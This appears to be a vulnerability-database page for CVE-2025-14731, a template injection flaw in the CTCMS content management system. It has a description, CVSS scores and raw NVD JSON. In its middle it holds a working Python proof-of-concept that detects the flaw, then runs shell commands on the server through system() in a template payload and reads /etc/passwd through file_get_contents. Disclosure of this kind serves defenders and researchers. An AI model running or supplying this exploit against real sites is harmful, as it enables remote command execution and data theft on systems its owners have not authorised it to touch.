Security Vulnerability Report
中文
CVE-2025-14731 CVSS 6.3 MEDIUM

CVE-2025-14731

Published: 2025-12-16 00:16:02
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in CTCMS Content Management System up to 2.1.2. This affects an unknown function in the library /ctcms/apps/libraries/CT_Parser.php of the component Frontend/Template Management Module. This manipulation causes improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ctcms_project:ctcms:*:*:*:*:*:*:*:* - VULNERABLE
CTCMS <= 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''CVE-2025-14731 SSTI PoC for CTCMS Tested on CTCMS <= 2.1.2 Target: /ctcms/apps/libraries/CT_Parser.php ''' import requests import sys TARGET_URL = "http://target-site.com/ctcms/" def test_ssti_basic(): """Test basic SSTI detection with math expression""" payload = "{{7*7}}" params = { "template": payload, "module": "frontend" } try: response = requests.get(TARGET_URL, params=params, timeout=10) if "49" in response.text: print("[+] Vulnerable to SSTI! Math expression evaluated.") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def exploit_rce(): """Execute arbitrary command via SSTI""" # PHP system() function via template injection cmd = "whoami" # Change to desired command payload = f"{{{{system('{cmd}')}}}}" params = { "template": payload, "module": "frontend" } try: response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[+] Command output: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Exploit failed: {e}") def exploit_file_read(): """Read sensitive files via SSTI""" file_path = "/etc/passwd" payload = f"{{{{file_get_contents('{file_path}')}}}}" params = { "template": payload, "module": "frontend" } try: response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[+] File content:\n{response.text[:500]}") except requests.RequestException as e: print(f"[-] File read failed: {e}") if __name__ == "__main__": print("[*] CVE-2025-14731 SSTI Scanner") print("[*] Target:", TARGET_URL) if test_ssti_basic(): print("[+] Target is vulnerable, attempting RCE...") exploit_rce() exploit_file_read() else: print("[-] Target may not be vulnerable or is not CTCMS")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14731", "sourceIdentifier": "[email protected]", "published": "2025-12-16T00:16:01.800", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CTCMS Content Management System up to 2.1.2. This affects an unknown function in the library /ctcms/apps/libraries/CT_Parser.php of the component Frontend/Template Management Module. This manipulation causes improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-791"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctcms_project:ctcms:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.2", "matchCriteriaId": "296130EC-EB46-458B-8934-EC5FE2225D0D"}]}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/Ros8ZIeCLQrN", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://note-hxlab.wetolink.com/share/U6cnRoRfn09r", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336488", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336488", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707106", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707107", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://note-hxlab.wetolink.com/share/Ros8ZIeCLQrN", "source": "134c704f-9b21-4f2e-91b3-4a467353 ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.